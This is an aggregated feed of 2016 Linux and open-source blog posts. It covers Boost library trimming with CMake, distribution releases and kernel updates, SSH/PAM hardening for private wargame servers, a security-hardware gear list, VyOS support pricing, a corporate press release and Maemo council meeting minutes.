index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency:

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)
#

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain and they are used by default when using GCC and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)
#

Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library.


21 August, 2016 08:48PM

Cesar Sevilla: Problemas con Revolution Slider (Abort Class-pclzip.php : Missing Zlib)

Si eres una persona que te gusta utilizar WordPress y te llega a salir este pequeño detalle (Abort Class-pclzip.php : Missing Zlib) cuando estás importante un Slider de Revolution Slider, no te preocupes, la solución es la siguiente:

  1. Debes editar el archivo que se encuentra dentro de la carpeta wp-admin/includes/: sudo nano /carpetadondeseencuentresusitio/wp-admin/includes/class-pclzip.php
  2. Encontrar la linea if (!function_exists(‘gzopen’)) y reemplazar gzopen por gzopen64.

Con ese pequeño cambio podrás seguir utilizando sin ningún problema el plugin.

Ahora, ¿Porqué da ese error?, en las últimas versiones de Ubuntu gzopen (función de PHP que nos permite abrir un archivo comprimido en .gz), solo está incluido para arquitectura de 64bits, es por esta razón que es necesario reemplazar gzopen por gzopen64 para que podamos importar todos esos archivos que se encuentran comprimido a través de este tipo de formato.

Happy Hacking!


21 August, 2016 05:37PM

hackergotchi for SparkyLinux

SparkyLinux

Login screen failed

 

Reported issue: the login screen (lightdm) doesn’t start after the first boot from a hard drive, after installing Sparky.

Possible reason: plymouth

To temporary handle with that, edit kernel starts options via GRUB.
Press ‘e’ key to edit it.

GRUB

Go to the end of the line started with “linux” and delete ‘quiet splash’ options.

GRUB

Than press “F10” key to boot.

It happens on some machines/some hardware.

Make sure that Sparky is based and fully compatible with Debian ‘testing’, so situations like that sometimes happen.

If you looking for a rock stable operating system – choose Debian ‘stable’.

 

21 August, 2016 01:34PM by pavroo

hackergotchi for VyOS

VyOS

Commercial support and professional services for VyOS

From earlier posts, you may remember Sentrium S.L., an IT consulting company founded by one of the VyOS maintainers and two long time VyOS users and community members.
In this post I (Daniil Baturin, that is) speak as a Sentrium founder, so "we" refers to all Sentrium employees, not to all VyOS maintainers as usual.

Now Sentrium is ready to offer commercial support and professional services for VyOS.

We plan to use funds towards VyOS project in various ways, including hiring people for both short-term/long-term tasks like bugfix and feature implementation, documentation improvements, VyOS events, building VyOS testing labs available for all contributors, development of training and certification programs and much more

Small businesses, educational institutions, and nonprofits may be eligible for discounts (subject to review, please contact us for details).

If you are interested, drop us an email to sales@sentrium.io or visit our website (http://www.sentrium.io/).

Commercial support

We offer two types of support plans at a fixed price:

  • Basic: email support only, response within two business days, 1500 eur/year
  • Standard: email support only, response within one business day, 5000 eur/year
To clarify it: it’s not 1500 or 5000 for each router, it’s for the entire company (single legal entity) no matter how many routers it uses.

VyOS support includes answering questions that you may have about VyOS, its installation and upgrade process, features and their usage and so on. We also can review customer network diagrams and config files and suggest what features and protocols to use and what changes can be made to optimize performance and scalability.

If you find any bugs or have any feature requests, we will help you figure out the details and reproducing procedure (in case of a bug) and communicate it to VyOS developers. We also offer external monitoring and emergency security notifications as part of support plans.

Custom support plans with different terms, such as included phone support, shorter response times or 24/7 support, hands-on assistance, etc. are also available since everyone's needs are different, and it's hard to devise a one size fits all solution, the cost is negotiated on case by case basis.

Professional Services

Professional services include VyOS installation, upgrade, migration from competing platforms, configuration according to requirements, troubleshooting and so on.

The base rate is 200 eur/hour, though depending on the complexity of the task and environment it may be lower or higher.

21 August, 2016 10:41AM by Yuriy Andamasov

hackergotchi for Ubuntu developers

Ubuntu developers

Valorie Zimmerman: Help a friend?

Hello, if you are reading this, and have a some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says, Hi, I recently started an online crowd funding campaign to help my mother with legal funds who is in the middle of divorce and domestic violence case.

 https://www.ketto.org/mother

Please support and share this message. Thanks.

21 August, 2016 07:55AM by Valorie Zimmerman (noreply@blogger.com)

hackergotchi for Emmabuntüs Debian Edition

Emmabuntüs Debian Edition

With THOT for a 2.0 solidarity

In this world, each individual has access to Internet and is enough digital savvy to have a great influence on its social and economical environment. Each individual, fully aware of the ecological impact on our planet, generated by 60 million tons of yearly electronic waste, should be able to clean and preserve its environment. We [...]

21 August, 2016 07:55AM by yves

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: (Slightly) Securing Wargame Servers

I was setting up some wargame boxes for a private group and wanted to reduce the risk of malfeasence/abuse from these boxes. One option, used by many public wargames, is locking down the firewall. While that’s a great start, I decided to go one step further and prevent directly logging in as the wargame users, requiring that the users of my private wargames have their own accounts.

Step 1: Setup the Private Accounts

This is pretty straightforward: create a group for these users that can SSH directly in, create their accounts, and setup their public keys.

# groupadd sshusers
# useradd -G sshusers matir
# su - matir
$ mkdir -p .ssh
$ echo 'AAA...' > .ssh/authorized_keys

Step 2: Configure PAM

This will setup PAM to define who can log in from where. Edit /etc/security/access.conf to look like this:

# /etc/security/access.conf
+ : (sshusers) : ALL
+ : ALL : 127.0.0.0/24
- : ALL : ALL

This allows sshusers to log in from anywhere, and everyone to log in locally. This way, users allowed via SSH log in, then port forward from their machine to the wargame server to connect as a level.

Edit /etc/pam.d/sshd to use this by uncommenting (or adding) a line:

account  required     pam_access.so nodefgroup

Step 3: Configure SSHD

Now we’ll configure SSHD to allow access as needed: passwords locally, keys only from remote hosts, and make sure we use pam. Ensure the following settings are set:

UsePAM yes

Match Host !127.0.0.0/24
  PasswordAuthentication no

Step 4: Test

Restart sshd and you should be able to connect remotely as any user in sshusers, but not any other user. You should also be able to port forward and check then connect with a username/password through the forwarded port.

21 August, 2016 07:00AM

August 20, 2016

hackergotchi for SparkyLinux

SparkyLinux

Linux kernel 4.7.2

 

A very quick update of the latest stable version of Linux kernel 4.7.2 is available in Sparky “unstable” repository.

Make sure you have Sparky “unstable” repository http://sparkylinux.org/wiki/doku.php/repository active to upgrade or install the latest kernel.

Follow the Wiki page: http://sparkylinux.org/wiki/doku.php/linux_kernel to install the latest Sparky’s Linux kernel.

Then reboot your machine to take effects.

To quick remove older version of the Linux kernel, simply run APTus-> Remove-> Uninstall Old Kernel script.

 

20 August, 2016 11:27PM by pavroo

SparkyLinux 4.4 is out

New, updated live/install iso images of SparkyLinux 4.4 “Tyche” are available to download now.

As before, Sparky “Home” editions provide fully featured operating system based on the Debian ‘testing’, with desktops of your choice: LXDE, LXQt, KDE, MATE and Xfce.

Changes between versions 4.3 and 4.4:
– full system upgrade as of August 15, 2016
– Linux kernel 4.6.4 (4.7.1-sparky is available in Sparky repos, see howto)
– firefox 45.3.0.ESR (firefox 48 is available in Sparky repos)
– calamares is available (but not default yet) in our repos
– new default theme called ‘Numix-SX’
– added new desktops to MinimalISO and APTus: Lumina, Trinity and PekWM
– ‘tint2’ panel replaced by ‘fbpanel’ in the MinimalGUI iso images
– added ‘rootactions-servicemenu’ to the Dolphin file manager in the KDE edition
– added short key which runs a terminal emulator in the MinimalGUI edition (Super+t)
– added an option which lets you install a PDF viewer, to the ‘sparky-office’ tool
– Midori web browser replaced by NetSurf in the MinimalGUI edition
– the ‘sparky-firstrun’ which lets you fully upgrade the system and install missing language packages has been fixed
– the ‘sparkylinux-installer’ – a part of ‘sparky-backup-core’ tool refreshes package list itself and installs the latest desktop settings in the MinimalGUI and MinimalCLI editions
– added Vivaldi and NetSurf web browsers to Sparky repos
– improved Wiki pages

The Sparky Advanced Installer runs on MinimalGUI or MinimalCLI iso image lets you install the base system with a minimal set of applications and a desktop of your choice, such as: awesome, bspwm, Budgie, Cinnamon, Enlightenment, Fluxbox, GNOME Flashback, GNOME Shell, i3, IceWM, JWM, KDE Plasma 5, Lumina, LXDE, LXQt, MATE, Openbox, Pantheon, PekWM, Trinity, Window Maker, Xfce.

It also lets you choose a web browser to be installed: Chromium, Dillo, Epiphany, Firefox (esr or latest), Konqueror, Midori, NetSurf, QupZilla, SeaMonkey, TOR Browser, Vivaldi.

The installation of a desktop of your choice via the Advanced Installer is possible only if your network connection is on (online installation). Otherwise, the Advanced Installer installs the Live system as it is.

Read the MinimalISO how to http://sparkylinux.org/wiki/doku.php/minimal

ISO images of SparkyLinux can be downloaded from the download page:
http://sparkylinux.org/download

Sparky ISO images verification how to: http://sparkylinux.org/wiki/doku.php/verify_iso

Known issues: login screen failed, see how to fix it.

 

20 August, 2016 12:29PM by pavroo

LMDE

Linux Mint 18 “Sarah” KDE – BETA Release

This is the BETA release for Linux Mint 18 “Sarah” KDE Edition.

Linux Mint 18 Sarah KDE Edition

Linux Mint 18 is a long term support release which will be supported until 2021. It comes with updated software and brings refinements and many new features to make your desktop even more comfortable to use.

New features:

This new version of Linux Mint contains many improvements.

For an overview of the new features please visit:

What’s new in Linux Mint 18 KDE“.

Important info:

The release notes provide important information about known issues, as well as explanations, workarounds and solutions.

To read the release notes, please visit:

Release Notes for Linux Mint 18 KDE

System requirements:

  • 2GB RAM.
  • 10GB of disk space (20GB recommended).
  • 1024×768 resolution (on lower resolutions, press ALT to drag windows with the mouse if they don’t fit in the screen).

Notes:

  • The 64-bit ISO can boot with BIOS or UEFI.
  • The 32-bit ISO can only boot with BIOS.
  • The 64-bit ISO is recommend for all modern computers (Almost all computers sold in the last 10 years are equipped with 64-bit processors).

Upgrade instructions:

  • This BETA release might contain critical bugs, please only use it for testing purposes and to help the Linux Mint team fix issues prior to the stable release.
  • It will be possible to upgrade from this BETA to the stable release.
  • It will not be possible to upgrade from Linux Mint 17.3 KDE (this edition uses Plasma 5 and this is considered a different desktop).

Bug reports:

  • Please report bugs below in the comment section of this blog.
  • When reporting bugs, please be as accurate as possible and include any information that might help developers reproduce the issue or understand the cause of the issue:
    • Bugs we can reproduce, or which cause we understand are usually fixed very easily.
    • It is important to mention whether a bug happens “always”, or “sometimes”, and what triggers it.
    • If a bug happens but didn’t happen before, or doesn’t happen in another distribution, or doesn’t happen in a different environment, please mention it and try to pinpoint the differences at play.
    • If we can’t reproduce a particular bug and we don’t understand its cause, it’s unlikely we’ll be able to fix it.
  • Please visit https://github.com/linuxmint/Roadmap to follow the progress of the development team between the BETA and the stable release.

Download links:

Here are the download links for the 64-bit ISO:

A 32-bit ISO image is also available at https://www.linuxmint.com/download_all.php.

Integrity and authenticity checks:

Once you have downloaded an image, please verify its integrity and authenticity.

Anyone can produce fake ISO images, it is your responsibility to check you are downloading the official ones.

Enjoy!

We look forward to receiving your feedback. Many thanks in advance for testing the BETA!

20 August, 2016 09:49AM by Clem

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Matir's Favorite Things

One of my friends was recently asking me about some of the tools I use, particularly for security assessments. While I can’t give out all of these things for free Oprah-style, I did want to take a moment to share some of my favorite security- and technology-related tools, services and resources.

Hardware

Lenovo T450s My primary laptop is a Lenovo T450s. For me, it’s the perfect mix of weight and processing power – configured with enough RAM, the i5-5200U has no trouble running 2 or 3 VMs at the same time, and with an internal 3-cell battery plus a 6-cell battery pack, it will go all day without an outlet. (Though not necessarily under 100% CPU load.) Though Lenovo no longer sells this, having replaced it with the T460s, it’s still available on Amazon.

Startech The StarTech.com USB 3.0 dual gigabit ethernet interface allows one to perform ethernet bridging or routing across it, while still having the built-in interface to connect to the internet. If you don’t have a built-in interface, it still gives you two interfaces to play with. Each interface is an ASIX AX88179 chip, and you’ll also see a VIA Labs, Inc. Hub appear when you connect it, giving some idea of how the device is implemented: a USB 3.0 hub, plus two USB 3.0 to GigE PHY chips. I haven’t benchmarked the interface (maybe I will soon) but for the cases I’ve used it for – mostly a passive MITM to observe traffic on embedded devices – it’s been much more than sufficient.

WiFi Pineapple Nano The WiFi Pineapple Nano is probably best known for its Karma trickery to impersonate other wireless networks, but this dual radio device is so much more. You can use it to connect one radio to a network and the other to share out WiFi, so you only have to pay for one connected device. In fact, you can put OpenVPN on it when doing this, so all your traffic (even on devices that don’t support a VPN, like a Kindle) is encrypted across the network. (Use WPA2 with a good passphrase on the client side if you want to have some semblance of privacy there.)

LAN Turtle The LAN Turtle is essentially a miniature ARM computer with two network interfaces. One of those interfaces is connected to a USB-to-Ethernet adapter, resulting in the entire device looking like an oversized USB-to-Ethernet adapter. You can plug this inline to a computer via USB and have an active MITM on the network, all powered from the USB port it’s plugged into. This is a stealthy drop box for access on an assessment. (I haven’t tried, but I imagine you can power it from a wall-wart and just plug in the wired interface if all if you need is a single network connection.) My biggest complaint about this device is that it, like all of the Hak5 hardware, is really not that open. I haven’t been able to build my own firmware for it, which I’d like to do, rather than just using the packages available in the default LAN Turtle firmware.

ALFA WiFi Adapter The ALFA AWUS036NH WiFi Adapter is the 802.11b/g/n version of the popular ALFA WiFi radios. It can go up to 2000 mW, but the legal limit in the USA is 1000 mW (30 dBm), and even at that power, you’re driving further than you can hear with most antennas. I like this package because it comes with a high-gain 7 dBi panel antenna and a suction cup mount, allowing you to place the adapter in the optimal position. Just in case that’s not enough, you can get a 13 dBi yagi to extend both your transmit and receive range even further. Great for demonstrating that a client can’t depend on physical distance to protect their wireless network.

Books

Oh man, I could go on for a while on books… I’m going to try to focus on just the highlights.

Stealing the Network There’s a number of books containing collections of anecdotes and stories that help to develop an attacker mindset, where you begin to think and understand as attackers do, preparing you to see things in a different light:

RTFM For Assessments, Penetration Testing, and other Offensive Security practices, there’s a huge variety of resources. While books do tend to become outdated quickly in this industry, the fundamentals don’t change that often, and it’s important to understand the fundamentals before moving on to the more advanced topics of discussion. While I strongly prefer eBooks (they’re lighter, go with me everywhere, and can be searched easily), one of my coworkers swears by the printed material – take your pick and do whatever works for you.

I’m not much of a blue teamer, so I’m hard pressed to suggest the “must have” books for that side of the house.

Services

I have to start with DigitalOcean. Not only is this blog hosted on one of their VPS, but I do a lot of my testing and research on their VPSs. Whenever I need a quick VM, I can spin one up there for under 1 cent per hour. I’ve had nearly perfect uptime (my own stupidity outweighs their outages at least 10 to 1) and on the rare occasion I’ve needed their support, it’s been absolutely first rate. DigitalOcean started off for developers, but they offer a great production-quality product for almost any use.

20 August, 2016 07:00AM

August 19, 2016

hackergotchi for SparkyLinux

SparkyLinux

EFL 1.18.0

 

There is an update of EFL 1.18.0 ready in Sparky repository now.

Due to the Enlightenment’s developers changes, the ‘evas-generic-loaders’, ’emotion-generic-players’ and ‘elementary’ have been merged into the EFL package and they are no available (as separated packages) in Sparky repos any more.

There is no changes with installing Enlightenment, so do it as before:
sudo apt-get update
sudo apt-get install enlightenment

To upgrade EFL and other Enlightenment’s tools, do:
sudo apt-get update
sudo apt-get dist-upgrade

It removes ‘evas-generic-loaders’, ’emotion-generic-players’ and ‘elementary’ automatically so no need any special users attention.

 

19 August, 2016 09:02PM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Cenique and Canonical partnering to create certified digital signage and audience measurement solutions

cenique-logo

Companies to provide plug and play digital signage and audience measurement solution based on Ubuntu Core.

London, UK – August 15, 2016 Canonical, today announced that it is entering in a partnership with Cenique to provide digital signage players that are certified for Ubuntu.

Cenique is an emerging leader in the Retail and Digital Out of Home (DOOH) industry, providing the DIY and SME markets the next generation Intelligent Digital Signage and Audience Measurement Solutions. Cenique provides its customers with both standard and customized hardware and software solutions, creating a perfect solution for their signage and audience measurement deployment needs.

In their quest to continuously expand their breadth of capabilities, Cenique is turning to a platform that matches its current mode of operation of providing an a la carte menu of features for Retail and Digital Out of Home (DOOH) deployments. Ubuntu Core with its app store and software management functionality offers the range of add-on services they’re looking to support, like various Content Management Systems (CMS) applications, remote management and update capabilities. The company therefore looks to take advantage of the many options available on Ubuntu with an eye on providing its customers with the perfect solution for their application.

Furthermore, Cenique is also looking to adopt snap as a packaging format for their digital signage and audience measurement applications. Through snap, Cenique can simplify the installation of the applications for their customers, while increasing the security and stability of their solution.

“Digital Signage technologies are benefiting from the fast-pace innovation of IoT. The ‘display only’ digital signage player now needs to be able to do a lot more – count passer-bys, offer wifi access, serve advertising based on time of day, weather conditions, offer interactive content, etc. Having Ubuntu certified players by Cenique means advertisers can benefit from the wealth of applications available on Ubuntu Core out of the box, and embrace this new era in Digital Signage,” said Thibaut Rouffineau, head of devices marketing at Canonical.

Shylesh Karuvath, Co-Founder & CEO says “Partnering with Canonical and their Ubuntu Core platform gives us the ability to expand from our current ARM based platform to multiple hardware platforms and IoT devices, opening new possibilities for Cenique. Ubuntu Core also enables us to be more focused on our Software Applications rather than on the OS and Distribution”

About Canonical
Canonical is the company behind Ubuntu, the leading Operating System for cloud and the Internet of Things. Most public cloud workloads are running Ubuntu, and most new smart gateways, self-driving cars and advanced humanoid robots are running Ubuntu as well. Canonical provides enterprise support and services for commercial users of Ubuntu.

Canonical leads the development of the snap universal Linux packaging system for secure, transactional device updates and app stores. Ubuntu Core is an all-snap OS, perfect for devices and appliances. Established in 2004, Canonical is a privately held company.

About Cenique
An emerging leader in Retail and Digital Out of Home (DOOH) industry, Cenique provide DIY and SME markets the next generation Intelligent Digital Signage and Audience Measurement Solutions. Cenique’s solutions are used by customers on most continents around the Globe in applications ranging from brand owners, retail chains, advertising network operators, corporations, professional baseball and basketball teams, universities, and many more.

Cenique is headquartered in Hong Kong with offices in North America and distributions points around the world. Visit www.cenique.com to learn more about our products and how we can work with you and your industry.

19 August, 2016 08:48AM

August 18, 2016

Valorie Zimmerman: Weeeeee! Akademy and Qtcon approaching fast



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of Qtcon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!

18 August, 2016 11:17PM by Valorie Zimmerman (noreply@blogger.com)

Valorie Zimmerman

18 August, 2016 11:13PM by Valorie Zimmerman (noreply@blogger.com)

Jonathan Riddell: Plasma Release Schedule Updated

I’ve made some changes to the Plasma 5.8 release schedule.  We had a request from our friends at openSUSE to bring the release sooner by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness.  As openSUSE are long term supporters and contributors to KDE as well as patrons of KDE the Plasma team chatted and decided to slide the dates around to help out.  Release is now on the first Tuesday in October.

 

Facebooktwittergoogle_pluslinkedinby feather

18 August, 2016 09:14PM

hackergotchi for SparkyLinux

SparkyLinux

Linux kernel 4.7.1

 

I have been busy whole last week fighting with new Sparky iso images, but all done so could build new kernel packages now.

The latest stable version of Linux kernel 4.7.1 just landed in Sparky “unstable” repository.

Make sure you have Sparky “unstable” repository http://sparkylinux.org/wiki/doku.php/repository active to upgrade or install the latest kernel.
amd64:
sudo apt-get install linux-image-sparky-amd64
686 non-pae:
sudo apt-get install linux-image-sparky-686
686-pae:
sudo apt-get install linux-image-sparky-686-pae

Then reboot your machine to take effects.

To quick remove older version of the Linux kernel, simply run APTus-> Remove-> Uninstall Old Kernel script.

 

18 August, 2016 07:30PM by pavroo

hackergotchi for Ubuntu developers

Ubuntu developers

Jonathan Riddell: Space Left at the (Non)Party Flat at Akademy/QtCon

Akademy is this year at QtCon along with FSF-E, Qt, VLC and others.

I booked a flat on AirBNB near to the Akademy location and there’s still a bed or two left available.

Wed Aug 31 CHECK IN 2:00 PM

Thu Sep 08 CHECK OUT 11:00 AM

Cost: £360 each, about €420 each

If you’d like to star with cool KDE people in a (gentle) party flat send me an e-mail.



Facebooktwittergoogle_pluslinkedinby feather

18 August, 2016 03:17PM

Jono Bacon: Opening Up Data Science with data.world

Earlier this year when I was in Austin, my friend Andy Sernovitz introduced me to a new startup called data.world.

What caught my interest is that they are building a platform to make data science and discovery easier, more accessible, and more collaborative. I love these kinds of big juicy challenges!

Recently I signed them up as a client to help them build their community, and I want to share a few words about why I think they are important, not just for data science fans, but from a wider scientific discovery perspective.

Screen Shot 2016-08-15 at 3.35.31 AM

Armchair Discovery

Data plays a critical role in the world. Buried in rows and rows of seemingly flat content are patterns, trends, and discoveries that can help us to learn, explore new ideas, and work more effectively.

The work that leads to these discoveries is often bringing together different data sets to explore and reach new conclusions. As an example, traffic accident data for a single town is interesting, but when we combine it with data sets for national/international traffic accidents, insurance claims, drink driving, and more, we can often find patterns that can help us to influence and encourage new behavior and technology.

Screen Shot 2016-08-15 at 3.36.10 AM

Many of these discoveries are hiding in plain sight. Sadly, while talented data scientists are able to pull together these different data sets, it is often hard and laborious work. Surely if we make this work easier, more accessible, consistent, and available to all we can speed up innovation and discovery?

Exactly.

As history has taught us, the right mixture of access, tooling, and community can have a tremendous impact. We have seen examples of this in open source (e.g. GitLab / GitHub), funding (e.g. Kickstarter / Indiegogo), and security (e.g. HackerOne).

data.world are doing this for data.

Data Science is Tough

There are four key areas where I think data.world can make a potent impact:

  1. Access – while there is lots of data in the world, access is inconsistent. Data is often spread across different sites, formats, and accessible to different people. We can bring this data together into a consistent platform, available to everyone.
  2. Preparation – much of the work data scientists perform is learning and prepping datasets for use. This work should be simplified, done once, and then shared with everyone, as opposed to being performed by each person who consumes the data.
  3. Collaboration – a lot of data science is fairly ad-hoc in how people work together. In much the same way open source has helped create common approaches for code, there is potential to do the same with data.
  4. Community – there is a great opportunity to build a diverse global community, not just of data scientists, but also organizations, charities, activists, and armchair sleuths who, armed with the right tools and expertise, could make many meaningful discoveries.

This is what data.world is building and I find the combination of access, platform, and network effects of data and community particularly exciting.

Unlocking Curiosity

If we look at the most profound impacts technology has had in recent years it is in bubbling people’s curiosity and creativity to the surface.

When we build community-based platforms that tap into this curiosity and creativity, we generate new ideas and approaches. New ideas and approaches then become the foundation for changing how the world thinks and operates.

screencapture-data-world-1471257465804

As one such example, open source tapped the curiosity and creativity of developers to produce a rich patchwork of software and tooling, but more importantly, a culture of openness and collaboration. While it is easy to see the software as the primary outcome, the impact of open source has been much deeper and impacted skills, education, career opportunities, business, collaboration, and more.

Enabling the same curiosity and creativity with the wealth of data we have in the world is going to be an exciting journey. Stay tuned.

The post Opening Up Data Science with data.world appeared first on Jono Bacon.

18 August, 2016 03:00PM

Ubuntu Podcast from the UK LoCo: S09E25 – Golden Keys - Ubuntu Podcast

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

18 August, 2016 02:00PM

hackergotchi for Maemo developers

Maemo developers

2016-07-26 Meeting Minutes

Meeting held 2016-07-26 on FreeNode, channel #maemo-meeting (logs)

Attending: pichlo, Win7Mac, eekkelund, reinob, juiceme

Partial: chem|st

Absent:

Summary of topics (ordered by discussion):

  • Topic Approve pending request on https://garage.maemo.org/admin/approve-pending.php
  • Topic Coding Competition
  • Topic Twitter account
  • Topic MC e.V.

(Topic Approve pending project request on https://garage.maemo.org/admin/approve-pending.php):

  • juiceme added Council to garage admin group
  • juiceme approved project request

(Topic Coding Competition):

  • Postponed CC by one month
  • Submitting an entry: "we could also set up an ftp site where we place whatever comes via mailing list, in case people prefer to download it like that" reinob could handle this

(Topic Twitter account):

  • Maemo community does not have twitter account
  • eekkelund will make one (Maemo Community, @maemo_org)

(Topic MC e.V.):

  • Choocing GA meeting dates
  • Court fillings
  • Win7Mac&reinob will candidate for board

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:
    • Set up ftp/sftp site for CC (reinob)
    • Create twitter account for maemo community(eekkelund)

Solved Action Items:
Find out if https is doable
0 Add to favourites0 Bury

18 August, 2016 06:39AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-19 Meeting Minutes

Meeting held 2016-07-19 on FreeNode, channel #maemo-meeting (logs)

Attending: Win7Mac, eekkelund, reinob

Partial:

Absent: pichlo, juiceme

Summary of topics (ordered by discussion):

  • Topic Coding Competition

(Topic Coding Competition):

  • How to submit an entry? Thread to TMO/email
  • Categories discussion, dropped wishlist.
  • Updated the Wiki page

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:

Solved Action Items:
Find out if https is doable
0 Add to favourites0 Bury

18 August, 2016 06:38AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-12 Meeting Minutes

Meeting held 2016-07-12 on FreeNode, channel #maemo-meeting (logs)

Attending: eekkelund, pichlo, reinob

Partial:

Absent: Win7Mac, juiceme

Summary of topics (ordered by discussion):

  • Topic Coding Competition

(Topic Coding Competition):

  • Donations, board has PayPal and bank account
  • Timeframe discussion
  • Categories discussion, 3 main categories: Something new, Fixing/Updating and Beginner.
  • Rules discussion
  • eekkelund has edited wiki page

Action Items:
  • old items:
    • Coding competition planning (eekkelund)
    • The next GA meeting should be announced soon.
  • new items:

Solved Action Items:
Find out if https is doable
0 Add to favourites0 Bury

18 August, 2016 06:36AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

2016-07-05 Meeting Minutes

Meeting held 2016-07-05 on FreeNode, channel #maemo-meeting (logs)

Attending: juiceme, eekkelund, pichlo, Win7Mac, reinob

Partial:

Absent:

Summary of topics (ordered by discussion):

  • Topic read-only option for TOR endpoints
  • Topic Coding Competition

(Topic read-only option for TOR endpoints):

  • There is thread in TMO
  • maemo.org should have read-only option for tor endpoints
  • Or if TMO is set up as hidden service then read-write access should be OK

(Topic Coding Competition):

  • eekkelund will start to write wiki page
  • Board will handle the prizes/donations
  • Timeframe discussion
  • Platforms discussion
  • Categories discussion
  • Voting, same as in elections

Action Items:
  • old items:
    • The next GA meeting should be announced soon.
  • new items:
    • Coding competition planning (eekkelund)

Solved Action Items:
Find out if https is doable
0 Add to favourites0 Bury

18 August, 2016 06:35AM by Eetu Kahelin (eetu.kahelin@metropolia.fi)

hackergotchi for Ubuntu developers

Ubuntu developers

Lubuntu Blog: We need your input on Lubuntu image sizes!

